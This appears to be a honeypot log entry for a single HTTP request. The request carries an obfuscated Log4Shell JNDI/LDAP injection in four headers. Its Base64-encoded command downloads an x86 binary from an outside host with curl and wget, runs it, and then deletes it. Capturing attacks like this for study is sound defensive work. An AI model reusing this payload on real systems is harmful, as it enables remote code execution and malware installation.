Attack 54f1fbbf-b705-40ca-b994-2cdde49afc72
Details
ID |
54f1fbbf-b705-40ca-b994-2cdde49afc72 |
Attack Type |
http |
IP Address |
5.255.102.98 |
Username |
|
Password |
|
Client Version |
|
Country |
Netherlands |
Date |
2023-03-09 11:32PM |
Request Data
{
"path": "",
"method": "GET",
"headers": {
"Cookie": "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.255.103.89:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzQ3Ljg3LjIwMS4xMjk6NzEvc2RqZHNoZGdkc2RzZnNmYXVzamFzaHNhZ2dzYWZzZmFhLng4NiAtbyBzZGpkc2hkZ2RzZHNmc2ZhdXNqYXNoc2FnZ3NhZnNmYWEueDg2OyB3Z2V0IGh0dHA6Ly80Ny44Ny4yMDEuMTI5OjcxL3NkamRzaGRnZHNkc2ZzZmF1c2phc2hzYWdnc2Fmc2ZhYS54ODY7IGNobW9kICt4IHNkamRzaGRnZHNkc2ZzZmF1c2phc2hzYWdnc2Fmc2ZhYS54ODY7IC4vc2RqZHNoZGdkc2RzZnNmYXVzamFzaHNhZ2dzYWZzZmFhLng4Njsgcm0gLXJmIHNkamRzaGRnZHNkc2ZzZmF1c2phc2hzYWdnc2Fmc2ZhYS54ODY7IHJtIC1yZiBzZGpkc2hkZ2RzZHNmc2ZhdXNqYXNoc2FnZ3NhZnNmYWEueDg2LjE=}')",
"Referer": "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.255.103.89:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzQ3Ljg3LjIwMS4xMjk6NzEvc2RqZHNoZGdkc2RzZnNmYXVzamFzaHNhZ2dzYWZzZmFhLng4NiAtbyBzZGpkc2hkZ2RzZHNmc2ZhdXNqYXNoc2FnZ3NhZnNmYWEueDg2OyB3Z2V0IGh0dHA6Ly80Ny44Ny4yMDEuMTI5OjcxL3NkamRzaGRnZHNkc2ZzZmF1c2phc2hzYWdnc2Fmc2ZhYS54ODY7IGNobW9kICt4IHNkamRzaGRnZHNkc2ZzZmF1c2phc2hzYWdnc2Fmc2ZhYS54ODY7IC4vc2RqZHNoZGdkc2RzZnNmYXVzamFzaHNhZ2dzYWZzZmFhLng4Njsgcm0gLXJmIHNkamRzaGRnZHNkc2ZzZmF1c2phc2hzYWdnc2Fmc2ZhYS54ODY7IHJtIC1yZiBzZGpkc2hkZ2RzZHNmc2ZhdXNqYXNoc2FnZ3NhZnNmYWEueDg2LjE=}')",
"Connection": "close",
"User-Agent": "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.255.103.89:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzQ3Ljg3LjIwMS4xMjk6NzEvc2RqZHNoZGdkc2RzZnNmYXVzamFzaHNhZ2dzYWZzZmFhLng4NiAtbyBzZGpkc2hkZ2RzZHNmc2ZhdXNqYXNoc2FnZ3NhZnNmYWEueDg2OyB3Z2V0IGh0dHA6Ly80Ny44Ny4yMDEuMTI5OjcxL3NkamRzaGRnZHNkc2ZzZmF1c2phc2hzYWdnc2Fmc2ZhYS54ODY7IGNobW9kICt4IHNkamRzaGRnZHNkc2ZzZmF1c2phc2hzYWdnc2Fmc2ZhYS54ODY7IC4vc2RqZHNoZGdkc2RzZnNmYXVzamFzaHNhZ2dzYWZzZmFhLng4Njsgcm0gLXJmIHNkamRzaGRnZHNkc2ZzZmF1c2phc2hzYWdnc2Fmc2ZhYS54ODY7IHJtIC1yZiBzZGpkc2hkZ2RzZHNmc2ZhdXNqYXNoc2FnZ3NhZnNmYWEueDg2LjE=}')",
"X-Api-Version": "t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5.255.103.89:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzQ3Ljg3LjIwMS4xMjk6NzEvc2RqZHNoZGdkc2RzZnNmYXVzamFzaHNhZ2dzYWZzZmFhLng4NiAtbyBzZGpkc2hkZ2RzZHNmc2ZhdXNqYXNoc2FnZ3NhZnNmYWEueDg2OyB3Z2V0IGh0dHA6Ly80Ny44Ny4yMDEuMTI5OjcxL3NkamRzaGRnZHNkc2ZzZmF1c2phc2hzYWdnc2Fmc2ZhYS54ODY7IGNobW9kICt4IHNkamRzaGRnZHNkc2ZzZmF1c2phc2hzYWdnc2Fmc2ZhYS54ODY7IC4vc2RqZHNoZGdkc2RzZnNmYXVzamFzaHNhZ2dzYWZzZmFhLng4Njsgcm0gLXJmIHNkamRzaGRnZHNkc2ZzZmF1c2phc2hzYWdnc2Fmc2ZhYS54ODY7IHJtIC1yZiBzZGpkc2hkZ2RzZHNmc2ZhdXNqYXNoc2FnZ3NhZnNmYWEueDg2LjE=}')"
},
"hostname": "168.235.81.160:8080",
"form_data": {}
}